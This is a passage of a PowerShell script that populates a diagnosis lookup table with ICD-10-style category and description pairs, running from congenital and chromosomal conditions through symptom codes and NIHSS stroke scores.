glands","Congenital malformations of other endocrine glands") + $null = $DiagnosisList.Rows.Add("Situs inversus","Situs inversus") + $null = $DiagnosisList.Rows.Add("Conjoined twins","Conjoined twins") + $null = $DiagnosisList.Rows.Add("Multiple congenital malformations, not elsewhere classified","Multiple congenital malformations, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specified congenital malformations","Other specified congenital malformations") + $null = $DiagnosisList.Rows.Add("Congenital malformation, unspecified","Congenital malformation, unspecified") + $null = $DiagnosisList.Rows.Add("Down syndrome","Trisomy 21, nonmosaicism (meiotic nondisjunction)") + $null = $DiagnosisList.Rows.Add("Down syndrome","Trisomy 21, mosaicism (mitotic nondisjunction)") + $null = $DiagnosisList.Rows.Add("Down syndrome","Trisomy 21, translocation") + $null = $DiagnosisList.Rows.Add("Down syndrome","Down syndrome, unspecified") + $null = $DiagnosisList.Rows.Add("Trisomy 18 and Trisomy 13","Trisomy 18, nonmosaicism (meiotic nondisjunction)") + $null = $DiagnosisList.Rows.Add("Trisomy 18 and Trisomy 13","Trisomy 18, mosaicism (mitotic nondisjunction)") + $null = $DiagnosisList.Rows.Add("Trisomy 18 and Trisomy 13","Trisomy 18, translocation") + $null = $DiagnosisList.Rows.Add("Trisomy 18 and Trisomy 13","Trisomy 18, unspecified") + $null = $DiagnosisList.Rows.Add("Trisomy 18 and Trisomy 13","Trisomy 13, nonmosaicism (meiotic nondisjunction)") + $null = $DiagnosisList.Rows.Add("Trisomy 18 and Trisomy 13","Trisomy 13, mosaicism (mitotic nondisjunction)") + $null = $DiagnosisList.Rows.Add("Trisomy 18 and Trisomy 13","Trisomy 13, translocation") + $null = $DiagnosisList.Rows.Add("Trisomy 18 and Trisomy 13","Trisomy 13, unspecified") + $null = $DiagnosisList.Rows.Add("Other trisomies and partial trisomies of the autosomes, not elsewhere classified","Whole chromosome trisomy, nonmosaicism (meiotic nondisjunction)") + $null = $DiagnosisList.Rows.Add("Other trisomies and partial trisomies of the autosomes, not elsewhere classified","Whole chromosome trisomy, mosaicism (mitotic nondisjunction)") + $null = $DiagnosisList.Rows.Add("Other trisomies and partial trisomies of the autosomes, not elsewhere classified","Partial trisomy") + $null = $DiagnosisList.Rows.Add("Other trisomies and partial trisomies of the autosomes, not elsewhere classified","Duplications with other complex rearrangements") + $null = $DiagnosisList.Rows.Add("Marker chromosomes","Marker chromosomes in normal individual") + $null = $DiagnosisList.Rows.Add("Marker chromosomes","Marker chromosomes in abnormal individual") + $null = $DiagnosisList.Rows.Add("Triploidy and polyploidy","Triploidy and polyploidy") + $null = $DiagnosisList.Rows.Add("Other specified trisomies and partial trisomies of autosomes","Other specified trisomies and partial trisomies of autosomes") + $null = $DiagnosisList.Rows.Add("Trisomy and partial trisomy of autosomes, unspecified","Trisomy and partial trisomy of autosomes, unspecified") + $null = $DiagnosisList.Rows.Add("Monosomies and deletions from the autosomes, not elsewhere classified","Whole chromosome monosomy, nonmosaicism (meiotic nondisjunction)") + $null = $DiagnosisList.Rows.Add("Monosomies and deletions from the autosomes, not elsewhere classified","Whole chromosome monosomy, mosaicism (mitotic nondisjunction)") + $null = $DiagnosisList.Rows.Add("Monosomies and deletions from the autosomes, not elsewhere classified","Chromosome replaced with ring, dicentric or isochromosome") + $null = $DiagnosisList.Rows.Add("Monosomies and deletions from the autosomes, not elsewhere classified","Deletion of short arm of chromosome 4") + $null = $DiagnosisList.Rows.Add("Monosomies and deletions from the autosomes, not elsewhere classified","Deletion of short arm of chromosome 5") + $null = $DiagnosisList.Rows.Add("Monosomies and deletions from the autosomes, not elsewhere classified","Other deletions of part of a chromosome") + $null = $DiagnosisList.Rows.Add("Monosomies and deletions from the autosomes, not elsewhere classified","Deletions with other complex rearrangements") + $null = $DiagnosisList.Rows.Add("Other deletions from the autosomes","Velo-cardio-facial syndrome") + $null = $DiagnosisList.Rows.Add("Other deletions from the autosomes","Other microdeletions") + $null = $DiagnosisList.Rows.Add("Other deletions from the autosomes","Other deletions from the autosomes") + $null = $DiagnosisList.Rows.Add("Deletion from autosomes, unspecified","Deletion from autosomes, unspecified") + $null = $DiagnosisList.Rows.Add("Balanced rearrangements and structural markers, not elsewhere classified","Balanced translocation and insertion in normal individual") + $null = $DiagnosisList.Rows.Add("Balanced rearrangements and structural markers, not elsewhere classified","Chromosome inversion in normal individual") + $null = $DiagnosisList.Rows.Add("Balanced rearrangements and structural markers, not elsewhere classified","Balanced autosomal rearrangement in abnormal individual") + $null = $DiagnosisList.Rows.Add("Balanced rearrangements and structural markers, not elsewhere classified","Balanced sex/autosomal rearrangement in abnormal individual") + $null = $DiagnosisList.Rows.Add("Balanced rearrangements and structural markers, not elsewhere classified","Individual with autosomal fragile site") + $null = $DiagnosisList.Rows.Add("Balanced rearrangements and structural markers, not elsewhere classified","Other balanced rearrangements and structural markers") + $null = $DiagnosisList.Rows.Add("Balanced rearrangements and structural markers, not elsewhere classified","Balanced rearrangement and structural marker, unspecified") + $null = $DiagnosisList.Rows.Add("Turner's syndrome","Karyotype 45, X") + $null = $DiagnosisList.Rows.Add("Turner's syndrome","Karyotype 46, X iso (Xq)") + $null = $DiagnosisList.Rows.Add("Turner's syndrome","Karyotype 46, X with abnormal sex chromosome, except iso (Xq)") + $null = $DiagnosisList.Rows.Add("Turner's syndrome","Mosaicism, 45, X/46, XX or XY") + $null = $DiagnosisList.Rows.Add("Turner's syndrome","Mosaicism, 45, X/other cell line(s) with abnormal sex chromosome") + $null = $DiagnosisList.Rows.Add("Turner's syndrome","Other variants of Turner's syndrome") + $null = $DiagnosisList.Rows.Add("Turner's syndrome","Turner's syndrome, unspecified") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, female phenotype, not elsewhere classified","Karyotype 47, XXX") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, female phenotype, not elsewhere classified","Female with more than three X chromosomes") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, female phenotype, not elsewhere classified","Mosaicism, lines with various numbers of X chromosomes") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, female phenotype, not elsewhere classified","Female with 46, XY karyotype") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, female phenotype, not elsewhere classified","Other specified sex chromosome abnormalities, female phenotype") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, female phenotype, not elsewhere classified","Sex chromosome abnormality, female phenotype, unspecified") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, male phenotype, not elsewhere classified","Klinefelter syndrome karyotype 47, XXY") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, male phenotype, not elsewhere classified","Klinefelter syndrome, male with more than two X chromosomes") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, male phenotype, not elsewhere classified","Other male with 46, XX karyotype") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, male phenotype, not elsewhere classified","Klinefelter syndrome, unspecified") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, male phenotype, not elsewhere classified","Karyotype 47, XYY") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, male phenotype, not elsewhere classified","Male with structurally abnormal sex chromosome") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, male phenotype, not elsewhere classified","Male with sex chromosome mosaicism") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, male phenotype, not elsewhere classified","Other specified sex chromosome abnormalities, male phenotype") + $null = $DiagnosisList.Rows.Add("Other sex chromosome abnormalities, male phenotype, not elsewhere classified","Sex chromosome abnormality, male phenotype, unspecified") + $null = $DiagnosisList.Rows.Add("Other chromosome abnormalities, not elsewhere classified","Chimera 46, XX/46, XY") + $null = $DiagnosisList.Rows.Add("Other chromosome abnormalities, not elsewhere classified","46, XX true hermaphrodite") + $null = $DiagnosisList.Rows.Add("Other chromosome abnormalities, not elsewhere classified","Fragile X chromosome") + $null = $DiagnosisList.Rows.Add("Other chromosome abnormalities, not elsewhere classified","Other specified chromosome abnormalities") + $null = $DiagnosisList.Rows.Add("Other chromosome abnormalities, not elsewhere classified","Chromosomal abnormality, unspecified") + $null = $DiagnosisList.Rows.Add("Abnormalities of heart beat","Tachycardia, unspecified") + $null = $DiagnosisList.Rows.Add("Abnormalities of heart beat","Bradycardia, unspecified") + $null = $DiagnosisList.Rows.Add("Abnormalities of heart beat","Palpitations") + $null = $DiagnosisList.Rows.Add("Abnormalities of heart beat","Other abnormalities of heart beat") + $null = $DiagnosisList.Rows.Add("Abnormalities of heart beat","Unspecified abnormalities of heart beat") + $null = $DiagnosisList.Rows.Add("Cardiac murmurs and other cardiac sounds","Benign and innocent cardiac murmurs") + $null = $DiagnosisList.Rows.Add("Cardiac murmurs and other cardiac sounds","Cardiac murmur, unspecified") + $null = $DiagnosisList.Rows.Add("Cardiac murmurs and other cardiac sounds","Other cardiac sounds") + $null = $DiagnosisList.Rows.Add("Abnormal blood-pressure reading, without diagnosis","Elevated blood-pressure reading, without diagnosis of hypertension") + $null = $DiagnosisList.Rows.Add("Abnormal blood-pressure reading, without diagnosis","Nonspecific low blood-pressure reading") + $null = $DiagnosisList.Rows.Add("Hemorrhage from respiratory passages","Epistaxis") + $null = $DiagnosisList.Rows.Add("Hemorrhage from respiratory passages","Hemorrhage from throat") + $null = $DiagnosisList.Rows.Add("Hemorrhage from respiratory passages","Hemoptysis") + $null = $DiagnosisList.Rows.Add("Hemorrhage from other sites in respiratory passages","Acute idiopathic pulmonary hemorrhage in infants") + $null = $DiagnosisList.Rows.Add("Hemorrhage from other sites in respiratory passages","Hemorrhage from other sites in respiratory passages") + $null = $DiagnosisList.Rows.Add("Hemorrhage from respiratory passages, unspecified","Hemorrhage from respiratory passages, unspecified") + $null = $DiagnosisList.Rows.Add("Cough","Cough") + $null = $DiagnosisList.Rows.Add("Dyspnea","Dyspnea, unspecified") + $null = $DiagnosisList.Rows.Add("Dyspnea","Orthopnea") + $null = $DiagnosisList.Rows.Add("Dyspnea","Shortness of breath") + $null = $DiagnosisList.Rows.Add("Dyspnea","Acute respiratory distress") + $null = $DiagnosisList.Rows.Add("Dyspnea","Other forms of dyspnea") + $null = $DiagnosisList.Rows.Add("Stridor","Stridor") + $null = $DiagnosisList.Rows.Add("Wheezing","Wheezing") + $null = $DiagnosisList.Rows.Add("Periodic breathing","Periodic breathing") + $null = $DiagnosisList.Rows.Add("Hyperventilation","Hyperventilation") + $null = $DiagnosisList.Rows.Add("Mouth breathing","Mouth breathing") + $null = $DiagnosisList.Rows.Add("Hiccough","Hiccough") + $null = $DiagnosisList.Rows.Add("Sneezing","Sneezing") + $null = $DiagnosisList.Rows.Add("Other abnormalities of breathing","Apnea, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other abnormalities of breathing","Tachypnea, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other abnormalities of breathing","Snoring") + $null = $DiagnosisList.Rows.Add("Other abnormalities of breathing","Other abnormalities of breathing") + $null = $DiagnosisList.Rows.Add("Unspecified abnormalities of breathing","Unspecified abnormalities of breathing") + $null = $DiagnosisList.Rows.Add("Pain in throat and chest","Pain in throat") + $null = $DiagnosisList.Rows.Add("Pain in throat and chest","Chest pain on breathing") + $null = $DiagnosisList.Rows.Add("Pain in throat and chest","Precordial pain") + $null = $DiagnosisList.Rows.Add("Other chest pain","Pleurodynia") + $null = $DiagnosisList.Rows.Add("Other chest pain","Intercostal pain") + $null = $DiagnosisList.Rows.Add("Other chest pain","Other chest pain") + $null = $DiagnosisList.Rows.Add("Chest pain, unspecified","Chest pain, unspecified") + $null = $DiagnosisList.Rows.Add("Asphyxia and hypoxemia","Asphyxia") + $null = $DiagnosisList.Rows.Add("Asphyxia and hypoxemia","Hypoxemia") + $null = $DiagnosisList.Rows.Add("Pleurisy","Pleurisy") + $null = $DiagnosisList.Rows.Add("Respiratory arrest","Respiratory arrest") + $null = $DiagnosisList.Rows.Add("Abnormal sputum","Abnormal sputum") + $null = $DiagnosisList.Rows.Add("Other specified symptoms and signs involving the circulatory and respiratory systems","Nasal congestion") + $null = $DiagnosisList.Rows.Add("Other specified symptoms and signs involving the circulatory and respiratory systems","Postnasal drip") + $null = $DiagnosisList.Rows.Add("Other specified symptoms and signs involving the circulatory and respiratory systems","Other specified symptoms and signs involving the circulatory and respiratory systems") + $null = $DiagnosisList.Rows.Add("Abdominal and pelvic pain","Acute abdomen") + $null = $DiagnosisList.Rows.Add("Pain localized to upper abdomen","Upper abdominal pain, unspecified") + $null = $DiagnosisList.Rows.Add("Pain localized to upper abdomen","Right upper quadrant pain") + $null = $DiagnosisList.Rows.Add("Pain localized to upper abdomen","Left upper quadrant pain") + $null = $DiagnosisList.Rows.Add("Pain localized to upper abdomen","Epigastric pain") + $null = $DiagnosisList.Rows.Add("Pelvic and perineal pain","Pelvic and perineal pain") + $null = $DiagnosisList.Rows.Add("Pain localized to other parts of lower abdomen","Lower abdominal pain, unspecified") + $null = $DiagnosisList.Rows.Add("Pain localized to other parts of lower abdomen","Right lower quadrant pain") + $null = $DiagnosisList.Rows.Add("Pain localized to other parts of lower abdomen","Left lower quadrant pain") + $null = $DiagnosisList.Rows.Add("Pain localized to other parts of lower abdomen","Periumbilical pain") + $null = $DiagnosisList.Rows.Add("Abdominal tenderness","Right upper quadrant abdominal tenderness") + $null = $DiagnosisList.Rows.Add("Abdominal tenderness","Left upper quadrant abdominal tenderness") + $null = $DiagnosisList.Rows.Add("Abdominal tenderness","Right lower quadrant abdominal tenderness") + $null = $DiagnosisList.Rows.Add("Abdominal tenderness","Left lower quadrant abdominal tenderness") + $null = $DiagnosisList.Rows.Add("Abdominal tenderness","Periumbilic abdominal tenderness") + $null = $DiagnosisList.Rows.Add("Abdominal tenderness","Epigastric abdominal tenderness") + $null = $DiagnosisList.Rows.Add("Abdominal tenderness","Generalized abdominal tenderness") + $null = $DiagnosisList.Rows.Add("Abdominal tenderness","Abdominal tenderness, unspecified site") + $null = $DiagnosisList.Rows.Add("Rebound abdominal tenderness","Right upper quadrant rebound abdominal tenderness") + $null = $DiagnosisList.Rows.Add("Rebound abdominal tenderness","Left upper quadrant rebound abdominal tenderness") + $null = $DiagnosisList.Rows.Add("Rebound abdominal tenderness","Right lower quadrant rebound abdominal tenderness") + $null = $DiagnosisList.Rows.Add("Rebound abdominal tenderness","Left lower quadrant rebound abdominal tenderness") + $null = $DiagnosisList.Rows.Add("Rebound abdominal tenderness","Periumbilic rebound abdominal tenderness") + $null = $DiagnosisList.Rows.Add("Rebound abdominal tenderness","Epigastric rebound abdominal tenderness") + $null = $DiagnosisList.Rows.Add("Rebound abdominal tenderness","Generalized rebound abdominal tenderness") + $null = $DiagnosisList.Rows.Add("Rebound abdominal tenderness","Rebound abdominal tenderness, unspecified site") + $null = $DiagnosisList.Rows.Add("Colic","Colic") + $null = $DiagnosisList.Rows.Add("Generalized abdominal pain","Generalized abdominal pain") + $null = $DiagnosisList.Rows.Add("Unspecified abdominal pain","Unspecified abdominal pain") + $null = $DiagnosisList.Rows.Add("Nausea and vomiting","Nausea") + $null = $DiagnosisList.Rows.Add("Vomiting","Vomiting, unspecified") + $null = $DiagnosisList.Rows.Add("Vomiting","Vomiting without nausea") + $null = $DiagnosisList.Rows.Add("Vomiting","Projectile vomiting") + $null = $DiagnosisList.Rows.Add("Vomiting","Vomiting of fecal matter") + $null = $DiagnosisList.Rows.Add("Vomiting","Bilious vomiting") + $null = $DiagnosisList.Rows.Add("Nausea with vomiting, unspecified","Nausea with vomiting, unspecified") + $null = $DiagnosisList.Rows.Add("Heartburn","Heartburn") + $null = $DiagnosisList.Rows.Add("Aphagia and dysphagia","Aphagia") + $null = $DiagnosisList.Rows.Add("Dysphagia","Dysphagia, unspecified") + $null = $DiagnosisList.Rows.Add("Dysphagia","Dysphagia, oral phase") + $null = $DiagnosisList.Rows.Add("Dysphagia","Dysphagia, oropharyngeal phase") + $null = $DiagnosisList.Rows.Add("Dysphagia","Dysphagia, pharyngeal phase") + $null = $DiagnosisList.Rows.Add("Dysphagia","Dysphagia, pharyngoesophageal phase") + $null = $DiagnosisList.Rows.Add("Dysphagia","Other dysphagia") + $null = $DiagnosisList.Rows.Add("Flatulence and related conditions","Abdominal distension (gaseous)") + $null = $DiagnosisList.Rows.Add("Flatulence and related conditions","Gas pain") + $null = $DiagnosisList.Rows.Add("Flatulence and related conditions","Eructation") + $null = $DiagnosisList.Rows.Add("Flatulence and related conditions","Flatulence") + $null = $DiagnosisList.Rows.Add("Fecal incontinence","Incomplete defecation") + $null = $DiagnosisList.Rows.Add("Fecal incontinence","Fecal smearing") + $null = $DiagnosisList.Rows.Add("Fecal incontinence","Fecal urgency") + $null = $DiagnosisList.Rows.Add("Fecal incontinence","Full incontinence of feces") + $null = $DiagnosisList.Rows.Add("Hepatomegaly and splenomegaly, not elsewhere classified","Hepatomegaly, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Hepatomegaly and splenomegaly, not elsewhere classified","Splenomegaly, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Hepatomegaly and splenomegaly, not elsewhere classified","Hepatomegaly with splenomegaly, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Unspecified jaundice","Unspecified jaundice") + $null = $DiagnosisList.Rows.Add("Ascites","Malignant ascites") + $null = $DiagnosisList.Rows.Add("Ascites","Other ascites") + $null = $DiagnosisList.Rows.Add("Intra-abdominal and pelvic swelling, mass and lump","Intra-abdominal and pelvic swelling, mass and lump, unspecified site") + $null = $DiagnosisList.Rows.Add("Intra-abdominal and pelvic swelling, mass and lump","Right upper quadrant abdominal swelling, mass and lump") + $null = $DiagnosisList.Rows.Add("Intra-abdominal and pelvic swelling, mass and lump","Left upper quadrant abdominal swelling, mass and lump") + $null = $DiagnosisList.Rows.Add("Intra-abdominal and pelvic swelling, mass and lump","Right lower quadrant abdominal swelling, mass and lump") + $null = $DiagnosisList.Rows.Add("Intra-abdominal and pelvic swelling, mass and lump","Left lower quadrant abdominal swelling, mass and lump") + $null = $DiagnosisList.Rows.Add("Intra-abdominal and pelvic swelling, mass and lump","Periumbilic swelling, mass or lump") + $null = $DiagnosisList.Rows.Add("Intra-abdominal and pelvic swelling, mass and lump","Epigastric swelling, mass or lump") + $null = $DiagnosisList.Rows.Add("Intra-abdominal and pelvic swelling, mass and lump","Generalized intra-abdominal and pelvic swelling, mass and lump") + $null = $DiagnosisList.Rows.Add("Intra-abdominal and pelvic swelling, mass and lump","Other intra-abdominal and pelvic swelling, mass and lump") + $null = $DiagnosisList.Rows.Add("Abnormal bowel sounds","Absent bowel sounds") + $null = $DiagnosisList.Rows.Add("Abnormal bowel sounds","Hyperactive bowel sounds") + $null = $DiagnosisList.Rows.Add("Abnormal bowel sounds","Other abnormal bowel sounds") + $null = $DiagnosisList.Rows.Add("Visible peristalsis","Visible peristalsis") + $null = $DiagnosisList.Rows.Add("Abdominal rigidity","Abdominal rigidity, unspecified site") + $null = $DiagnosisList.Rows.Add("Abdominal rigidity","Right upper quadrant abdominal rigidity") + $null = $DiagnosisList.Rows.Add("Abdominal rigidity","Left upper quadrant abdominal rigidity") + $null = $DiagnosisList.Rows.Add("Abdominal rigidity","Right lower quadrant abdominal rigidity") + $null = $DiagnosisList.Rows.Add("Abdominal rigidity","Left lower quadrant abdominal rigidity") + $null = $DiagnosisList.Rows.Add("Abdominal rigidity","Periumbilic abdominal rigidity") + $null = $DiagnosisList.Rows.Add("Abdominal rigidity","Epigastric abdominal rigidity") + $null = $DiagnosisList.Rows.Add("Abdominal rigidity","Generalized abdominal rigidity") + $null = $DiagnosisList.Rows.Add("Change in bowel habit","Change in bowel habit") + $null = $DiagnosisList.Rows.Add("Other fecal abnormalities","Other fecal abnormalities") + $null = $DiagnosisList.Rows.Add("Halitosis","Halitosis") + $null = $DiagnosisList.Rows.Add("Diarrhea, unspecified","Diarrhea, unspecified") + $null = $DiagnosisList.Rows.Add("Other specified symptoms and signs involving the digestive system and abdomen","Other specified symptoms and signs involving the digestive system and abdomen") + $null = $DiagnosisList.Rows.Add("Disturbances of skin sensation","Anesthesia of skin") + $null = $DiagnosisList.Rows.Add("Disturbances of skin sensation","Hypoesthesia of skin") + $null = $DiagnosisList.Rows.Add("Disturbances of skin sensation","Paresthesia of skin") + $null = $DiagnosisList.Rows.Add("Disturbances of skin sensation","Hyperesthesia") + $null = $DiagnosisList.Rows.Add("Disturbances of skin sensation","Other disturbances of skin sensation") + $null = $DiagnosisList.Rows.Add("Disturbances of skin sensation","Unspecified disturbances of skin sensation") + $null = $DiagnosisList.Rows.Add("Rash and other nonspecific skin eruption","Rash and other nonspecific skin eruption") + $null = $DiagnosisList.Rows.Add("Localized swelling, mass and lump of skin and subcutaneous tissue","Localized swelling, mass and lump, head") + $null = $DiagnosisList.Rows.Add("Localized swelling, mass and lump of skin and subcutaneous tissue","Localized swelling, mass and lump, neck") + $null = $DiagnosisList.Rows.Add("Localized swelling, mass and lump of skin and subcutaneous tissue","Localized swelling, mass and lump, trunk") + $null = $DiagnosisList.Rows.Add("Localized swelling, mass and lump, upper limb","Localized swelling, mass and lump, unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Localized swelling, mass and lump, upper limb","Localized swelling, mass and lump, right upper limb") + $null = $DiagnosisList.Rows.Add("Localized swelling, mass and lump, upper limb","Localized swelling, mass and lump, left upper limb") + $null = $DiagnosisList.Rows.Add("Localized swelling, mass and lump, upper limb","Localized swelling, mass and lump, upper limb, bilateral") + $null = $DiagnosisList.Rows.Add("Localized swelling, mass and lump, lower limb","Localized swelling, mass and lump, unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Localized swelling, mass and lump, lower limb","Localized swelling, mass and lump, right lower limb") + $null = $DiagnosisList.Rows.Add("Localized swelling, mass and lump, lower limb","Localized swelling, mass and lump, left lower limb") + $null = $DiagnosisList.Rows.Add("Localized swelling, mass and lump, lower limb","Localized swelling, mass and lump, lower limb, bilateral") + $null = $DiagnosisList.Rows.Add("Localized swelling, mass and lump, unspecified","Localized swelling, mass and lump, unspecified") + $null = $DiagnosisList.Rows.Add("Other skin changes","Cyanosis") + $null = $DiagnosisList.Rows.Add("Other skin changes","Pallor") + $null = $DiagnosisList.Rows.Add("Other skin changes","Flushing") + $null = $DiagnosisList.Rows.Add("Other skin changes","Spontaneous ecchymoses") + $null = $DiagnosisList.Rows.Add("Other skin changes","Changes in skin texture") + $null = $DiagnosisList.Rows.Add("Other skin changes","Other skin changes") + $null = $DiagnosisList.Rows.Add("Other skin changes","Unspecified skin changes") + $null = $DiagnosisList.Rows.Add("Abnormal involuntary movements","Abnormal head movements") + $null = $DiagnosisList.Rows.Add("Abnormal involuntary movements","Tremor, unspecified") + $null = $DiagnosisList.Rows.Add("Abnormal involuntary movements","Cramp and spasm") + $null = $DiagnosisList.Rows.Add("Abnormal involuntary movements","Fasciculation") + $null = $DiagnosisList.Rows.Add("Abnormal involuntary movements","Other abnormal involuntary movements") + $null = $DiagnosisList.Rows.Add("Abnormal involuntary movements","Unspecified abnormal involuntary movements") + $null = $DiagnosisList.Rows.Add("Abnormalities of gait and mobility","Ataxic gait") + $null = $DiagnosisList.Rows.Add("Abnormalities of gait and mobility","Paralytic gait") + $null = $DiagnosisList.Rows.Add("Abnormalities of gait and mobility","Difficulty in walking, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other abnormalities of gait and mobility","Unsteadiness on feet") + $null = $DiagnosisList.Rows.Add("Other abnormalities of gait and mobility","Other abnormalities of gait and mobility") + $null = $DiagnosisList.Rows.Add("Unspecified abnormalities of gait and mobility","Unspecified abnormalities of gait and mobility") + $null = $DiagnosisList.Rows.Add("Other lack of coordination","Ataxia, unspecified") + $null = $DiagnosisList.Rows.Add("Other lack of coordination","Other lack of coordination") + $null = $DiagnosisList.Rows.Add("Other lack of coordination","Unspecified lack of coordination") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the nervous and musculoskeletal systems","Tetany") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the nervous and musculoskeletal systems","Meningismus") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the nervous and musculoskeletal systems","Abnormal reflex") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the nervous and musculoskeletal systems","Abnormal posture") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the nervous and musculoskeletal systems","Clicking hip") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the nervous and musculoskeletal systems","Transient paralysis") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the nervous and musculoskeletal systems","Repeated falls") + $null = $DiagnosisList.Rows.Add("NIHSS score 0-9","NIHSS score 0") + $null = $DiagnosisList.Rows.Add("NIHSS score 0-9","NIHSS score 1") + $null = $DiagnosisList.Rows.Add("NIHSS score 0-9","NIHSS score 2") + $null = $DiagnosisList.Rows.Add("NIHSS score 0-9","NIHSS score 3") + $null = $DiagnosisList.Rows.Add("NIHSS score 0-9","NIHSS score 4") + $null = $DiagnosisList.Rows.Add("NIHSS score 0-9","NIHSS score 5") + $null = $DiagnosisList.Rows.Add("NIHSS score 0-9","NIHSS score 6") + $null = $DiagnosisList.Rows.Add("NIHSS score 0-9","NIHSS score 7") + $null = $DiagnosisList.Rows.Add("NIHSS score 0-9","NIHSS score 8") + $null = $DiagnosisList.Rows.Add("NIHSS score 0-9","NIHSS score 9") + $null = $DiagnosisList.Rows.Add("NIHSS score 10-19","NIHSS score 10") + $null = $DiagnosisList.Rows.Add("NIHSS score 10-19","NIHSS score 11") + $null = $DiagnosisList.Rows.Add("NIHSS score 10-19","NIHSS score 12") + $null = $DiagnosisList.Rows.Add("NIHSS score 10-19","NIHSS score 13") + $null = $DiagnosisList.Rows.Add("NIHSS score 10-19","NIHSS score 14") + $null = $DiagnosisList.Rows.Add("NIHSS score 10-19","NIHSS score 15") + $null = $DiagnosisList.Rows.Add("NIHSS score 10-19","NIHSS score 16") + $null = $DiagnosisList.Rows.Add("NIHSS score 10-19","NIHSS score 17") + $null = $DiagnosisList.Rows.Add("NIHSS score 10-19","NIHSS score 18") + $null = $DiagnosisList.Rows.Add("NIHSS score 10-19","NIHSS score 19") + $null = $DiagnosisList.Rows.Add("NIHSS score 20-29","NIHSS score 20") + $null = $DiagnosisList.Rows.Add("NIHSS score 20-29","NIHSS score 21") + $null = $DiagnosisList.Rows.Add("NIHSS score 20-29","NIHSS score 22") + $null = $DiagnosisList.Rows.Add("NIHSS score 20-29","NIHSS score 23") + $null = $DiagnosisList.Rows.Add("NIHSS score 20-29","NIHSS score 24") + $null = $DiagnosisList.Rows.Add("NIHSS score 20-29","NIHSS score 25") + $null = $DiagnosisList.Rows.Add("NIHSS score 20-29","NIHSS score 26") + $null = $DiagnosisList.Rows.Add("NIHSS score 20-29","NIHSS score 27") + $null = $DiagnosisList.Rows.Add("NIHSS score 20-29","NIHSS score 28") + $null = $DiagnosisList.Rows.Add("NIHSS score 20-29","NIHSS score 29") + $null = $DiagnosisList.Rows.Add("NIHSS score 30-39","NIHSS score 30") + $null = $DiagnosisList.Rows.Add("NIHSS score 30-39","NIHSS score 31") + $null = $DiagnosisList.Rows.Add("NIHSS score 30-39","NIHSS score 32") + $null = $DiagnosisList.Rows.Add("NIHSS score 30-39","NIHSS score 33") + $null = $DiagnosisList.Rows.Add("NIHSS score 30-39","NIHSS score 34") + $null = $DiagnosisList.Rows.Add("NIHSS score 30-39","NIHSS score 35") + $null = $DiagnosisList.Rows.Add("NIHSS score 30-39","NIHSS score 36") + $null = $DiagnosisList.Rows.Add("NIHSS score 30-39","NIHSS score 37") + $null = $DiagnosisList.Rows.Add("NIHSS score 30-39","NIHSS score 38") + $null = $DiagnosisList.Rows.Add("NIHSS score 30-39","NIHSS score 39") + $null = $DiagnosisList.Rows.Add("NIHSS score 40-42","NIHSS score 40") + $null = $DiagnosisList.Rows.Add("NIHSS score 40-42","NIHSS score 41") + $null = $DiagnosisList.Rows.Add("NIHSS score 40-42","NIHSS score 42") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the nervous system","Facial weakness") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the nervous system","Other symptoms and signs involving the nervous system") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the musculoskeletal system","Loss of height") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the musculoskeletal system","Ocular torticollis") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the musculoskeletal system","Other symptoms and signs involving the musculoskeletal system") + $null = $DiagnosisList.Rows.Add("Unspecified symptoms and signs involving the nervous and musculoskeletal systems","Unspecified symptoms and signs involving the nervous system") + $null = $DiagnosisList.Rows.Add("Unspecified symptoms and signs involving the nervous and musculoskeletal systems","Unspecified symptoms and signs involving the musculoskeletal system") + $null = $DiagnosisList.Rows.Add("Pain associated with micturition","Dysuria") + $null = $DiagnosisList.Rows.Add("Pain associated with micturition","Vesical tenesmus") + $null = $DiagnosisList.Rows.Add("Pain associated with micturition","Painful micturition, unspecified") + $null = $DiagnosisList.Rows.Add("Hematuria","Gross hematuria") + $null = $DiagnosisList.Rows.Add("Hematuria","Benign essential microscopic hematuria") + $null = $DiagnosisList.Rows.Add("Other microscopic hematuria","Asymptomatic microscopic hematuria") + $null = $DiagnosisList.Rows.Add("Other microscopic hematuria","Other microscopic hematuria") + $null = $DiagnosisList.Rows.Add("Hematuria, unspecified","Hematuria, unspecified") + $null = $DiagnosisList.Rows.Add("Unspecified urinary incontinence","Unspecified urinary incontinence") + $null = $DiagnosisList.Rows.Add("Retention of urine","Drug induced retention of urine") + $null = $DiagnosisList.Rows.Add("Retention of urine","Other retention of urine") + $null = $DiagnosisList.Rows.Add("Retention of urine","Retention of 